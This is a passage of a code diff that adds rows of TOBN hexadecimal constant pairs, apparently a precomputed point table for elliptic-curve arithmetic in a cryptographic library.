+     TOBN(0xbeb5f623, 0x0bca6de3), TOBN(0xdd20dd99, 0xb1e706fd),
+     TOBN(0x90b3ff9d, 0xac9059d4), TOBN(0x2d7b2902, 0x7ccccc4e),
+     TOBN(0x8a090a59, 0xce98840f), TOBN(0xa5d947e0, 0x8410680a),
+     TOBN(0x49ae346a, 0x923379a5), TOBN(0x7dbc84f9, 0xb28a3156),
+     TOBN(0xfd40d916, 0x54a1aff2), TOBN(0xabf318ba, 0x3a78fb9b),
+     TOBN(0x50152ed8, 0x3029f95e), TOBN(0x9fc1dd77, 0xc58ad7fa),
+     TOBN(0x5fa57915, 0x13595c17), TOBN(0xb9504668, 0x8f62b3a9),
+     TOBN(0x907b5b24, 0xff3055b0), TOBN(0x2e995e35, 0x9a84f125),
+     TOBN(0x87dacf69, 0x7e9bbcfb), TOBN(0x95d0c1d6, 0xe86d96e3),
+     TOBN(0x65726e3c, 0x2d95a75c), TOBN(0x2c3c9001, 0xacd27f21),
+     TOBN(0x1deab561, 0x6c973f57), TOBN(0x108b7e2c, 0xa5221643),
+     TOBN(0x5fee9859, 0xc4ef79d4), TOBN(0xbd62b88a, 0x40d4b8c6),
+     TOBN(0xb4dd29c4, 0x197c75d6), TOBN(0x266a6df2, 0xb7076feb),
+     TOBN(0x9512d0ea, 0x4bf2df11), TOBN(0x1320c24f, 0x6b0cc9ec),
+     TOBN(0x6bb1e0e1, 0x01a59596), TOBN(0x8317c5bb, 0xeff9aaac),
+     TOBN(0x65bb405e, 0x385aa6c9), TOBN(0x613439c1, 0x8f07988f),
+     TOBN(0xd730049f, 0x16a66e91), TOBN(0xe97f2820, 0xfa1b0e0d),
+     TOBN(0x4131e003, 0x304c28ea), TOBN(0x820ab732, 0x526bac62),
+     TOBN(0xb2ac9ef9, 0x28714423), TOBN(0x54ecfffa, 0xadb10cb2),
+     TOBN(0x8781476e, 0xf886a4cc), TOBN(0x4b2c87b5, 0xdb2f8d49),
+     TOBN(0xe857cd20, 0x0a44295d), TOBN(0x707d7d21, 0x58c6b044),
+     TOBN(0xae8521f9, 0xf596757c), TOBN(0x87448f03, 0x67b2b714),
+     TOBN(0x13a9bc45, 0x5ebcd58d), TOBN(0x79bcced9, 0x9122d3c1),
+     TOBN(0x3c644247, 0x9e076642), TOBN(0x0cf22778, 0x2df4767d),
+     TOBN(0x5e61aee4, 0x71d444b6), TOBN(0x211236bf, 0xc5084a1d),
+     TOBN(0x7e15bc9a, 0x4fd3eaf6), TOBN(0x68df2c34, 0xab622bf5),
+     TOBN(0x9e674f0f, 0x59bf4f36), TOBN(0xf883669b, 0xd7f34d73),
+     TOBN(0xc48ac1b8, 0x31497b1d), TOBN(0x323b925d, 0x5106703b),
+     TOBN(0x22156f42, 0x74082008), TOBN(0xeffc521a, 0xc8482bcb),
+     TOBN(0x5c6831bf, 0x12173479), TOBN(0xcaa2528f, 0xc4739490),
+     TOBN(0x84d2102a, 0x8f1b3c4d), TOBN(0xcf64dfc1, 0x2d9bec0d),
+     TOBN(0x433febad, 0x78a546ef), TOBN(0x1f621ec3, 0x7b73cef1),
+     TOBN(0x6aecd627, 0x37338615), TOBN(0x162082ab, 0x01d8edf6),
+     TOBN(0x833a8119, 0x19e86b66), TOBN(0x6023a251, 0xd299b5db),
+     TOBN(0xf5bb0c3a, 0xbbf04b89), TOBN(0x6735eb69, 0xae749a44),
+     TOBN(0xd0e058c5, 0x4713de3b), TOBN(0xfdf2593e, 0x2c3d4ccd),
+     TOBN(0x1b8f414e, 0xfdd23667), TOBN(0xdd52aaca, 0xfa2015ee),
+     TOBN(0x3e31b517, 0xbd9625ff), TOBN(0x5ec9322d, 0x8db5918c),
+     TOBN(0xbc73ac85, 0xa96f5294), TOBN(0x82aa5bf3, 0x61a0666a),
+     TOBN(0x49755810, 0xbf08ac42), TOBN(0xd21cdfd5, 0x891cedfc),
+     TOBN(0x918cb57b, 0x67f8be10), TOBN(0x365d1a7c, 0x56ffa726),
+     TOBN(0x2435c504, 0x6532de93), TOBN(0xc0fc5e10, 0x2674cd02),
+     TOBN(0x6e51fcf8, 0x9cbbb142), TOBN(0x1d436e5a, 0xafc50692),
+     TOBN(0x766bffff, 0x3fbcae22), TOBN(0x3148c2fd, 0xfd55d3b8),
+     TOBN(0x52c7fdc9, 0x233222fa), TOBN(0x89ff1092, 0xe419fb6b),
+     TOBN(0x3cd6db99, 0x25254977), TOBN(0x2e85a161, 0x1cf12ca7),
+     TOBN(0xadd2547c, 0xdc810bc9), TOBN(0xea3f458f, 0x9d257c22),
+     TOBN(0x642c1fbe, 0x27d6b19b), TOBN(0xed07e6b5, 0x140481a6),
+     TOBN(0x6ada1d42, 0x86d2e0f8), TOBN(0xe5920122, 0x0e8a9fd5),
+     TOBN(0x02c936af, 0x708c1b49), TOBN(0x60f30fee, 0x2b4bfaff),
+     TOBN(0x6637ad06, 0x858e6a61), TOBN(0xce4c7767, 0x3fd374d0),
+     TOBN(0x39d54b2d, 0x7188defb), TOBN(0xa8c9d250, 0xf56a6b66),
+     TOBN(0x58fc0f5e, 0xb24fe1dc), TOBN(0x9eaf9dee, 0x6b73f24c),
+     TOBN(0xa90d588b, 0x33650705), TOBN(0xde5b62c5, 0xaf2ec729),
+     TOBN(0x5c72cfae, 0xd3c2b36e), TOBN(0x868c19d5, 0x034435da),
+     TOBN(0x88605f93, 0xe17ee145), TOBN(0xaa60c4ee, 0x77a5d5b1),
+     TOBN(0xbcf5bfd2, 0x3b60c472), TOBN(0xaf4ef13c, 0xeb1d3049),
+     TOBN(0x373f44fc, 0xe13895c9), TOBN(0xf29b382f, 0x0cbc9822),
+     TOBN(0x1bfcb853, 0x73efaef6), TOBN(0xcf56ac9c, 0xa8c96f40),
+     TOBN(0xd7adf109, 0x7a191e24), TOBN(0x98035f44, 0xbf8a8dc2),
+     TOBN(0xf40a71b9, 0x1e750c84), TOBN(0xc57f7b0c, 0x5dc6c469),
+     TOBN(0x49a0e79c, 0x6fbc19c1), TOBN(0x6b0f5889, 0xa48ebdb8),
+     TOBN(0x5d3fd084, 0xa07c4e9f), TOBN(0xc3830111, 0xab27de14),
+     TOBN(0x0e4929fe, 0x33e08dcc), TOBN(0xf4a5ad24, 0x40bb73a3),
+     TOBN(0xde86c2bf, 0x490f97ca), TOBN(0x288f09c6, 0x67a1ce18),
+     TOBN(0x364bb886, 0x1844478d), TOBN(0x7840fa42, 0xceedb040),
+     TOBN(0x1269fdd2, 0x5a631b37), TOBN(0x94761f1e, 0xa47c8b7d),
+     TOBN(0xfc0c2e17, 0x481c6266), TOBN(0x85e16ea2, 0x3daa5fa7),
+     TOBN(0xccd86033, 0x92491048), TOBN(0x0c2f6963, 0xf4d402d7),
+     TOBN(0x6336f7df, 0xdf6a865c), TOBN(0x0a2a463c, 0xb5c02a87),
+     TOBN(0xb0e29be7, 0xbf2f12ee), TOBN(0xf0a22002, 0x66bad988),
+     TOBN(0x27f87e03, 0x9123c1d7), TOBN(0x21669c55, 0x328a8c98),
+     TOBN(0x186b9803, 0x92f14529), TOBN(0xd3d056cc, 0x63954df3),
+     TOBN(0x2f03fd58, 0x175a46f6), TOBN(0x63e34ebe, 0x11558558),
+     TOBN(0xe13fedee, 0x5b80cfa5), TOBN(0xe872a120, 0xd401dbd1),
+     TOBN(0x52657616, 0xe8a9d667), TOBN(0xbc8da4b6, 0xe08d6693),
+     TOBN(0x370fb9bb, 0x1b703e75), TOBN(0x6773b186, 0xd4338363),
+     TOBN(0x18dad378, 0xecef7bff), TOBN(0xaac787ed, 0x995677da),
+     TOBN(0x4801ea8b, 0x0437164b), TOBN(0xf430ad20, 0x73fe795e),
+     TOBN(0xb164154d, 0x8ee5eb73), TOBN(0x0884ecd8, 0x108f7c0e),
+     TOBN(0x0e6ec096, 0x5f520698), TOBN(0x640631fe, 0x44f7b8d9),
+     TOBN(0x92fd34fc, 0xa35a68b9), TOBN(0x9c5a4b66, 0x4d40cf4e),
+     TOBN(0x949454bf, 0x80b6783d), TOBN(0x80e701fe, 0x3a320a10),
+     TOBN(0x8d1a564a, 0x1a0a39b2), TOBN(0x1436d53d, 0x320587db),
+     TOBN(0xf5096e6d, 0x6556c362), TOBN(0xbc23a3c0, 0xe2455d7e),
+     TOBN(0x3a7aee54, 0x807230f9), TOBN(0x9ba1cfa6, 0x22ae82fd),
+     TOBN(0x833a057a, 0x99c5d706), TOBN(0x8be85f4b, 0x842315c9),
+     TOBN(0xd083179a, 0x66a72f12), TOBN(0x2fc77d5d, 0xcdcc73cd),
+     TOBN(0x22b88a80, 0x5616ee30), TOBN(0xfb09548f, 0xe7ab1083),
+     TOBN(0x8ad6ab0d, 0x511270cd), TOBN(0x61f6c57a, 0x6924d9ab),
+     TOBN(0xa0f7bf72, 0x90aecb08), TOBN(0x849f87c9, 0x0df784a4),
+     TOBN(0x27c79c15, 0xcfaf1d03), TOBN(0xbbf9f675, 0xc463face),
+     TOBN(0x91502c65, 0x765ba543), TOBN(0x18ce3cac, 0x42ea60dd),
+     TOBN(0xe5cee6ac, 0x6e43ecb3), TOBN(0x63e4e910, 0x68f2aeeb),
+     TOBN(0x26234fa3, 0xc85932ee), TOBN(0x96883e8b, 0x4c90c44d),
+     TOBN(0x29b9e738, 0xa18a50f6), TOBN(0xbfc62b2a, 0x3f0420df),
+     TOBN(0xd22a7d90, 0x6d3e1fa9), TOBN(0x17115618, 0xfe05b8a3),
+     TOBN(0x2a0c9926, 0xbb2b9c01), TOBN(0xc739fcc6, 0xe07e76a2),
+     TOBN(0x540e9157, 0x165e439a), TOBN(0x06353a62, 0x6a9063d8),
+     TOBN(0x84d95594, 0x61e927a3), TOBN(0x013b9b26, 0xe2e0be7f),
+     TOBN(0x4feaec3b, 0x973497f1), TOBN(0x15c0f94e, 0x093ebc2d),
+     TOBN(0x6af5f227, 0x33af0583), TOBN(0x0c2af206, 0xc61f3340),
+     TOBN(0xd25dbdf1, 0x4457397c), TOBN(0x2e8ed017, 0xcabcbae0),
+     TOBN(0xe3010938, 0xc2815306), TOBN(0xbaa99337, 0xe8c6cd68),
+     TOBN(0x08513182, 0x3b0ec7de), TOBN(0x1e1b822b, 0x58df05df),
+     TOBN(0x5c14842f, 0xa5c3b683), TOBN(0x98fe977e, 0x3eba34ce),
+     TOBN(0xfd2316c2, 0x0d5e8873), TOBN(0xe48d839a, 0xbd0d427d),
+     TOBN(0x495b2218, 0x623fc961), TOBN(0x24ee56e7, 0xb46fba5e),
+     TOBN(0x9184a55b, 0x91e4de58), TOBN(0xa7488ca5, 0xdfdea288),
+     TOBN(0xa723862e, 0xa8dcc943), TOBN(0x92d762b2, 0x849dc0fc),
+     TOBN(0x3c444a12, 0x091ff4a9), TOBN(0x581113fa, 0x0cada274),
+     TOBN(0xb9de0a45, 0x30d8eae2), TOBN(0x5e0fcd85, 0xdf6b41ea),
+     TOBN(0x6233ea68, 0xc094dbb5), TOBN(0xb77d062e, 0xd968d410),
+     TOBN(0x3e719bbc, 0x58b3002d), TOBN(0x68e7dd3d, 0x3dc49d58),
+     TOBN(0x8d825740, 0x013a5e58), TOBN(0x21311747, 0x3c9e3c1b),
+     TOBN(0x0cb0a2a7, 0x7c99b6ab), TOBN(0x5c48a3b3, 0xc2f888f2)}
+    ,
+    {TOBN(0xc7913e91, 0x991724f3), TOBN(0x5eda799c, 0x39cbd686),
+     TOBN(0xddb595c7, 0x63d4fc1e), TOBN(0x6b63b80b, 0xac4fed54),
+     TOBN(0x6ea0fc69, 0x7e5fb516), TOBN(0x737708ba, 0xd0f1c964),
+     TOBN(0x9628745f, 0x11a92ca5), TOBN(0x61f37958, 0x9a86967a),
+     TOBN(0x9af39b2c, 0xaa665072), TOBN(0x78322fa4, 0xefd324ef),
+     TOBN(0x3d153394, 0xc327bd31), TOBN(0x81d5f271, 0x3129dab0),
+     TOBN(0xc72e0c42, 0xf48027f5), TOBN(0xaa40cdbc, 0x8536e717),
+     TOBN(0xf45a657a, 0x2d369d0f), TOBN(0xb03bbfc4, 0xea7f74e6),
+     TOBN(0x46a8c418, 0x0d738ded), TOBN(0x6f1a5bb0, 0xe0de5729),
+     TOBN(0xf10230b9, 0x8ba81675), TOBN(0x32c6f30c, 0x112b33d4),
+     TOBN(0x7559129d, 0xd8fffb62), TOBN(0x6a281b47, 0xb459bf05),
+     TOBN(0x77c1bd3a, 0xfa3b6776), TOBN(0x0709b380, 0x7829973a),
+     TOBN(0x8c26b232, 0xa3326505), TOBN(0x38d69272, 0xee1d41bf),
+     TOBN(0x0459453e, 0xffe32afa), TOBN(0xce8143ad, 0x7cb3ea87),
+     TOBN(0x932ec1fa, 0x7e6ab666), TOBN(0x6cd2d230, 0x22286264),
+     TOBN(0x459a46fe, 0x6736f8ed), TOBN(0x50bf0d00, 0x9eca85bb),
+     TOBN(0x0b825852, 0x877a21ec), TOBN(0x300414a7, 0x0f537a94),
+     TOBN(0x3f1cba40, 0x21a9a6a2), TOBN(0x50824eee, 0x76943c00),
+     TOBN(0xa0dbfcec, 0xf83cba5d), TOBN(0xf9538148, 0x93b4f3c0),
+     TOBN(0x61744162, 0x48f24dd7), TOBN(0x5322d64d, 0xe4fb09dd),
+     TOBN(0x57447384, 0x3d9325f3), TOBN(0xa9bef2d0, 0xf371cb84),
+     TOBN(0x77d2188b, 0xa61e36c5), TOBN(0xbbd6a7d7, 0xc602df72),
+     TOBN(0xba3aa902, 0x8f61bc0b), TOBN(0xf49085ed, 0x6ed0b6a1),
+     TOBN(0x8bc625d6, 0xae6e8298), TOBN(0x832b0b1d, 0xa2e9c01d),
+     TOBN(0xa337c447, 0xf1f0ced1), TOBN(0x800cc793, 0x9492dd2b),
+     TOBN(0x4b93151d, 0xbea08efa), TOBN(0x820cf3f8, 0xde0a741e),
+     TOBN(0xff1982dc, 0x1c0f7d13), TOBN(0xef921960, 0x84dde6ca),
+     TOBN(0x1ad7d972, 0x45f96ee3), TOBN(0x319c8dbe, 0x29dea0c7),
+     TOBN(0xd3ea3871, 0x7b82b99b), TOBN(0x75922d4d, 0x470eb624),
+     TOBN(0x8f66ec54, 0x3b95d466), TOBN(0x66e673cc, 0xbee1e346),
+     TOBN(0x6afe67c4, 0xb5f2b89a), TOBN(0x3de9c1e6, 0x290e5cd3),
+     TOBN(0x8c278bb6, 0x310a2ada), TOBN(0x420fa384, 0x0bdb323b),
+     TOBN(0x0ae1d63b, 0x0eb919b0), TOBN(0xd74ee51d, 0xa74b9620),
+     TOBN(0x395458d0, 0xa674290c), TOBN(0x324c930f, 0x4620a510),
+     TOBN(0x2d1f4d19, 0xfbac27d4), TOBN(0x4086e8ca, 0x9bedeeac),
+     TOBN(0x0cdd211b, 0x9b679ab8), TOBN(0x5970167d, 0x7090fec4),
+     TOBN(0x3420f2c9, 0xfaf1fc63), TOBN(0x616d333a, 0x328c8bb4),
+     TOBN(0x7d65364c, 0x57f1fe4a), TOBN(0x9343e877, 0x55e5c73a),
+     TOBN(0x5795176b, 0xe970e78c), TOBN(0xa36ccebf, 0x60533627),
+     TOBN(0xfc7c7380, 0x09cdfc1b), TOBN(0xb39a2afe, 0xb3fec326),
+     TOBN(0xb7ff1ba1, 0x6224408a), TOBN(0xcc856e92, 0x247cfc5e),
+     TOBN(0x01f102e7, 0xc18bc493), TOBN(0x4613ab74, 0x2091c727),
+     TOBN(0xaa25e89c, 0xc420bf2b), TOBN(0x00a53176, 0x90337ec2),
+     TOBN(0xd2be9f43, 0x7d025fc7), TOBN(0x3316fb85, 0x6e6fe3dc),
+     TOBN(0x27520af5, 0x9ac50814), TOBN(0xfdf95e78, 0x9a8e4223),
+     TOBN(0xb7e7df2a, 0x56bec5a0), TOBN(0xf7022f7d, 0xdf159e5d),
+     TOBN(0x93eeeab1, 0xcac1fe8f), TOBN(0x8040188c, 0x37451168),
+     TOBN(0x7ee8aa8a, 0xd967dce6), TOBN(0xfa0e79e7, 0x3abc9299),
+     TOBN(0x67332cfc, 0x2064cfd1), TOBN(0x339c31de, 0xb0651934),
+     TOBN(0x719b28d5, 0x2a3bcbea), TOBN(0xee74c82b, 0x9d6ae5c6),
+     TOBN(0x0927d05e, 0xbaf28ee6), TOBN(0x82cecf2c, 0x9d719028),
+     TOBN(0x0b0d353e, 0xddb30289), TOBN(0xfe4bb977, 0xfddb2e29),
+     TOBN(0xbb5bb990, 0x640bfd9e), TOBN(0xd226e277, 0x82f62108),
+     TOBN(0x4bf00985, 0x02ffdd56), TOBN(0x7756758a, 0x2ca1b1b5),
+     TOBN(0xc32b62a3, 0x5285fe91), TOBN(0xedbc546a, 0x8c9cd140),
+     TOBN(0x1e47a013, 0xaf5cb008), TOBN(0xbca7e720, 0x073ce8f2),
+     TOBN(0xe10b2ab8, 0x17a91cae), TOBN(0xb89aab65, 0x08e27f63),
+     TOBN(0x7b3074a7, 0xdba3ddf9), TOBN(0x1c20ce09, 0x330c2972),
+     TOBN(0x6b9917b4, 0x5fcf7e33), TOBN(0xe6793743, 0x945ceb42),
+     TOBN(0x18fc2215, 0x5c633d19), TOBN(0xad1adb3c, 0xc7485474),
+     TOBN(0x646f9679, 0x6424c49b), TOBN(0xf888dfe8, 0x67c241c9),
+     TOBN(0xe12d4b93, 0x24f68b49), TOBN(0x9a6b62d8, 0xa571df20),
+     TOBN(0x81b4b26d, 0x179483cb), TOBN(0x666f9632, 0x9511fae2),
+     TOBN(0xd281b3e4, 0xd53aa51f), TOBN(0x7f96a765, 0x7f3dbd16),
+     TOBN(0xa7f8b5bf, 0x074a30ce), TOBN(0xd7f52107, 0x005a32e6),
+     TOBN(0x6f9e0907, 0x50237ed4), TOBN(0x2f21da47, 0x8096fa2b),
+     TOBN(0xf3e19cb4, 0xeec863a0), TOBN(0xd18f77fd, 0x9527620a),
+     TOBN(0x9505c81c, 0x407c1cf8), TOBN(0x9998db4e, 0x1b6ec284),
+     TOBN(0x7e3389e5, 0xc247d44d), TOBN(0x12507141, 0x3f4f3d80),
+     TOBN(0xd4ba0110, 0x4a78a6c7), TOBN(0x312874a0, 0x767720be),
+     TOBN(0xded059a6, 0x75944370), TOBN(0xd6123d90, 0x3b2c0bdd),
+     TOBN(0xa56b717b, 0x51c108e3), TOBN(0x9bb7940e, 0x070623e9),
+     TOBN(0x794e2d59, 0x84ac066c), TOBN(0xf5954a92, 0xe68c69a0),
+     TOBN(0x28c52458, 0x4fd99dcc), TOBN(0x60e639fc, 0xb1012517),
+     TOBN(0xc2e60125, 0x7de79248), TOBN(0xe9ef6404, 0xf12fc6d7),
+     TOBN(0x4c4f2808, 0x2a3b5d32), TOBN(0x865ad32e, 0xc768eb8a),
+     TOBN(0xac02331b, 0x13fb70b6), TOBN(0x037b44c1, 0x95599b27),
+     TOBN(0x1a860fc4, 0x60bd082c), TOBN(0xa2e25745, 0xc980cd01),
+     TOBN(0xee3387a8, 0x1da0263e), TOBN(0x931bfb95, 0x2d10f3d6),
+     TOBN(0x5b687270, 0xa1f24a32), TOBN(0xf140e65d, 0xca494b86),
+     TOBN(0x4f4ddf91, 0xb2f1ac7a), TOBN(0xf99eaabb, 0x760fee27),
+     TOBN(0x57f4008a, 0x49c228e5), TOBN(0x090be440, 0x1cf713bb),
+     TOBN(0xac91fbe4, 0x5004f022), TOBN(0xd838c2c2, 0x569e1af6),
+     TOBN(0xd6c7d20b, 0x0f1daaa5), TOBN(0xaa063ac1, 0x1bbb02c0),
+     TOBN(0x0938a422, 0x59558a78), TOBN(0x5343c669, 0x8435da2f),
+     TOBN(0x96f67b18, 0x034410dc), TOBN(0x7cc1e424, 0x84510804),
+     TOBN(0x86a1543f, 0x16dfbb7d), TOBN(0x921fa942, 0x5b5bd592),
+     TOBN(0x9dcccb6e, 0xb33dd03c), TOBN(0x8581ddd9, 0xb843f51e),
+     TOBN(0x54935fcb, 0x81d73c9e), TOBN(0x6d07e979, 0x0a5e97ab),
+     TOBN(0x4dc7b30a, 0xcf3a6bab), TOBN(0x147ab1f3, 0x170bee11),
+     TOBN(0x0aaf8e3d, 0x9fafdee4), TOBN(0xfab3dbcb, 0x538a8b95),
+     TOBN(0x405df4b3, 0x6ef13871), TOBN(0xf1f4e9cb, 0x088d5a49),
+     TOBN(0x9bcd24d3, 0x66b33f1d), TOBN(0x3b97b820, 0x5ce445c0),
+     TOBN(0xe2926549, 0xba93ff61), TOBN(0xd9c341ce, 0x4dafe616),
+     TOBN(0xfb30a76e, 0x16efb6f3), TOBN(0xdf24b8ca, 0x605b953c),
+     TOBN(0x8bd52afe, 0xc2fffb9f), TOBN(0xbbac5ff7, 0xe19d0b96),
+     TOBN(0x43c01b87, 0x459afccd), TOBN(0x6bd45143, 0xb7432652),
+     TOBN(0x84734530, 0x55b5d78e), TOBN(0x81088fdb, 0x1554ba7d),
+     TOBN(0xada0a52c, 0x1e269375), TOBN(0xf9f037c4, 0x2dc5ec10),
+     TOBN(0xc0660607, 0x94bfbc11), TOBN(0xc0a630bb, 0xc9c40d2f),
+     TOBN(0x5efc797e, 0xab64c31e), TOBN(0xffdb1dab, 0x74507144),
+     TOBN(0xf6124287, 0x1ca6790c), TOBN(0xe9609d81, 0xe69bf1bf),
+     TOBN(0xdb898595, 0x00d24fc9), TOBN(0x9c750333, 0xe51fb417),
+     TOBN(0x51830a91, 0xfef7bbde), TOBN(0x0ce67dc8, 0x945f585c),
+     TOBN(0x9a730ed4, 0x4763eb50), TOBN(0x24a0e221, 0xc1ab0d66),
+     TOBN(0x643b6393, 0x648748f3), TOBN(0x1982daa1, 0x6d3c6291),
+     TOBN(0x6f00a9f7, 0x8bbc5549), TOBN(0x7a1783e1, 0x7f36384e),
+     TOBN(0xe8346323, 0xde977f50), TOBN(0x91ab688d, 0xb245502a),
+     TOBN(0x331ab6b5, 0x6d0bdd66), TOBN(0x0a6ef32e, 0x64b71229),
+     TOBN(0x1028150e, 0xfe7c352f), TOBN(0x27e04350, 0xce7b39d3),
+     TOBN(0x2a3c8acd, 0xc1070c82), TOBN(0xfb2034d3, 0x80c9feef),
+     TOBN(0x2d729621, 0x709f3729), TOBN(0x8df290bf, 0x62cb4549),
+     TOBN(0x02f99f33, 0xfc2e4326), TOBN(0x3b30076d, 0x5eddf032),
+     TOBN(0xbb21f8cf, 0x0c652fb5), TOBN(0x314fb49e, 0xed91cf7b),
+     TOBN(0xa013eca5, 0x2f700750), TOBN(0x2b9e3c23, 0x712a4575),
+     TOBN(0xe5355557, 0xaf30fbb0), TOBN(0x1ada3516, 0x7c77e771),
+     TOBN(0x45f6ecb2, 0x7b135670), TOBN(0xe85d19df, 0x7cfc202e),
+     TOBN(0x0f1b50c7, 0x58d1be9f), TOBN(0x5ebf2c0a, 0xead2e344),
+     TOBN(0x1531fe4e, 0xabc199c9), TOBN(0xc7032592, 0x56bab0ae),
+     TOBN(0x16ab2e48, 0x6c1fec54), TOBN(0x0f87fda8, 0x04280188),
+     TOBN(0xdc9f46fc, 0x609e4a74), TOBN(0x2a44a143, 0xba667f91),
+     TOBN(0xbc3d8b95, 0xb4d83436), TOBN(0xa01e4bd0, 0xc7bd2958),
+     TOBN(0x7b182932, 0x73483c90), TOBN(0xa79c6aa1, 0xa7c7b598),
+     TOBN(0xbf3983c6, 0xeaaac07e), TOBN(0x8f18181e, 0x96e0d4e6),
+     TOBN(0x8553d37c, 0x051af62b), TOBN(0xe9a998eb, 0x0bf94496),
+     TOBN(0xe0844f9f, 0xb0d59aa1), TOBN(0x983fd558, 0xe6afb813),
+     TOBN(0x9670c0ca, 0x65d69804), TOBN(0x732b22de, 0x6ea5ff2d),
+     TOBN(0xd7640ba9, 0x5fd8623b), TOBN(0x9f619163, 0xa6351782),
+     TOBN(0x0bfc27ee, 0xacee5043), TOBN(0xae419e73, 0x2eb10f02),
+     TOBN(0x19c028d1, 0x8943fb05), TOBN(0x71f01cf7, 0xff13aa2a),
+     TOBN(0x7790737e, 0x8887a132), TOBN(0x67513309, 0x66318410),
+     TOBN(0x9819e8a3, 0x7ddb795e), TOBN(0xfecb8ef5, 0xdad100b2),
+     TOBN(0x59f74a22, 0x3021926a), TOBN(0xb7c28a49, 0x6f9b4c1c),
+     TOBN(0xed1a733f, 0x912ad0ab), TOBN(0x42a910af, 0x01a5659c),
+     TOBN(0x3842c6e0, 0x7bd68cab), TOBN(0x2b57fa38, 0x76d70ac8),
+     TOBN(0x8a6707a8, 0x3c53aaeb), TOBN(0x62c1c510, 0x65b4db18),
+     TOBN(0x8de2c1fb, 0xb2d09dc7), TOBN(0xc3dfed12, 0x266bd23b),
+     TOBN(0x927d039b, 0xd5b27db6), TOBN(0x2fb2f0f1, 0x103243da),
+     TOBN(0xf855a07b, 0x80be7399), TOBN(0xed9327ce, 0x1f9f27a8),
+     TOBN(0xa0bd99c7, 0x729bdef7), TOBN(0x2b67125e, 0x28250d88),
+     TOBN(0x784b26e8, 0x8670ced7), TOBN(0xe3dfe41f, 0xc31bd3b4),
+     TOBN(0x9e353a06, 0xbcc85cbc), TOBN(0x302e2909, 0x60178a9d),
+     TOBN(0x860abf11, 0xa6eac16e), TOBN(0x76447000, 0xaa2b3aac),
+     TOBN(0x46ff9d19, 0x850afdab), TOBN(0x35bdd6a5, 0xfdb2d4c1),
+     TOBN(0xe82594b0, 0x7e5c9ce9), TOBN(0x0f379e53, 0x20af346e),
+     TOBN(0x608b31e3, 0xbc65ad4a), TOBN(0x710c6b12, 0x267c4826),
+     TOBN(0x51c966f9, 0x71954cf1), TOBN(0xb1cec793, 0x0d0aa215),
+     TOBN(0x1f155989, 0x86bd23a8), TOBN(0xae2ff99c, 0xf9452e86),
+     TOBN(0xd8dd953c, 0x340ceaa2), TOBN(0x26355275, 0x2e2e9333),
+     TOBN(0x15d4e5f9, 0x8586f06d), TOBN(0xd6bf94a8, 0xf7cab546),
+     TOBN(0x33c59a0a, 0xb76a9af0), TOBN(0x52740ab3, 0xba095af7),
+     TOBN(0xc444de8a, 0x24389ca0), TOBN(0xcc6f9863, 0x706da0cb),
+     TOBN(0xb5a741a7, 0x6b2515cf), TOBN(0x71c41601, 0x9585c749),
+     TOBN(0x78350d4f, 0xe683de97), TOBN(0x31d61524, 0x63d0b5f5),
+     TOBN(0x7a0cc5e1, 0xfbce090b), TOBN(0xaac927ed, 0xfbcb2a5b),
+     TOBN(0xe920de49, 0x20d84c35), TOBN(0x8c06a0b6, 0x22b4de26),
+     TOBN(0xd34dd58b, 0xafe7ddf3), TOBN(0x55851fed, 0xc1e6e55b),
+     TOBN(0xd1395616, 0x960696e7), TOBN(0x940304b2, 0x5f22705f),
+     TOBN(0x6f43f861, 0xb0a2a860), TOBN(0xcf121282, 0x0e7cc981),
+     TOBN(0x12186212, 0x0ab64a96), TOBN(0x09215b9a, 0xb789383c),
+     TOBN(0x311eb305, 0x37387c09), TOBN(0xc5832fce, 0xf03ee760),
+     TOBN(0x30358f58, 0x32f7ea19), TOBN(0xe01d3c34, 0x91d53551),
+     TOBN(0x1ca5ee41, 0xda48ea80), TOBN(0x34e71e8e, 0xcf4fa4c1),
+     TOBN(0x312abd25, 0x7af1e1c7), TOBN(0xe3afcdeb, 0x2153f4a5),
+     TOBN(0x9d5c84d7, 0x00235e9a), TOBN(0x0308d3f4, 0x8c4c836f),
+     TOBN(0xc0a66b04, 0x89332de5), TOBN(0x610dd399, 0x89e566ef),
+     TOBN(0xf8eea460, 0xd1ac1635), TOBN(0x84cbb3fb, 0x20a2c0df),
+     TOBN(0x40afb488, 0xe74a48c5), TOBN(0x29738198, 0xd326b150),
+     TOBN(0x2a17747f, 0xa6d74081), TOBN(0x60ea4c05, 0x55a26214),
+     TOBN(0x53514bb4, 0x1f88c5fe), TOBN(0xedd64567, 0x7e83426c),
+     TOBN(0xd5d6cbec, 0x96460b25), TOBN(0xa12fd0ce, 0x68dc115e),
+     TOBN(0xc5bc3ed2, 0x697840ea), TOBN(0x969876a8, 0xa6331e31),
+     TOBN(0x60c36217, 0x472ff580), TOBN(0xf4229705, 0x4ad41393),
+     TOBN(0x4bd99ef0, 0xa03b8b92), TOBN(0x501c7317, 0xc144f4f6),
+     TOBN(0x159009b3, 0x18464945), TOBN(0x6d5e594c, 0x74c5c6be),
+     TOBN(0x2d587011, 0x321a3660), TOBN(0xd1e184b1, 0x3898d022),
+     TOBN(0x5ba04752, 0x4c6a7e04), TOBN(0x47fa1e2b, 0x45550b65),
+     TOBN(0x9419daf0, 0x48c0a9a5), TOBN(0x66362953, 0x7c243236),
+     TOBN(0xcd0744b1, 0x5cb12a88), TOBN(0x561b6f9a, 0x2b646188),
+     TOBN(0x599415a5, 0x66c2c0c0), TOBN(0xbe3f0859, 0x0f83f09a),
+     TOBN(0x9141c5be, 0xb92041b8), TOBN(0x01ae38c7, 0x26477d0d),
+     TOBN(0xca8b71f3, 0xd12c7a94), TOBN(0xfab5b31f, 0x765c70db),
+     TOBN(0x76ae7492, 0x487443e9), TOBN(0x8595a310, 0x990d1349),
+     TOBN(0xf8dbeda8, 0x7d460a37), TOBN(0x7f7ad082, 0x1e45a38f),
+     TOBN(0xed1d4db6, 0x1059705a), TOBN(0xa3dd492a, 0xe6b9c697),
+     TOBN(0x4b92ee3a, 0x6eb38bd5), TOBN(0xbab2609d, 0x67cc0bb7),
+     TOBN(0x7fc4fe89, 0x6e70ee82), TOBN(0xeff2c56e, 0x13e6b7e3),
+     TOBN(0x9b18959e, 0x34d26fca), TOBN(0x2517ab66, 0x889d6b45),
+     TOBN(0xf167b4e0, 0xbdefdd4f), TOBN(0x69958465, 0xf366e401),
+     TOBN(0x5aa368ab, 0xa73bbec0), TOBN(0x12148709, 0x7b240c21),
+     TOBN(0x378c3233, 0x18969006), TOBN(0xcb4d73ce, 0xe1fe53d1),
+     TOBN(0x5f50a80e, 0x130c4361), TOBN(0xd67f5951, 0x7ef5212b),
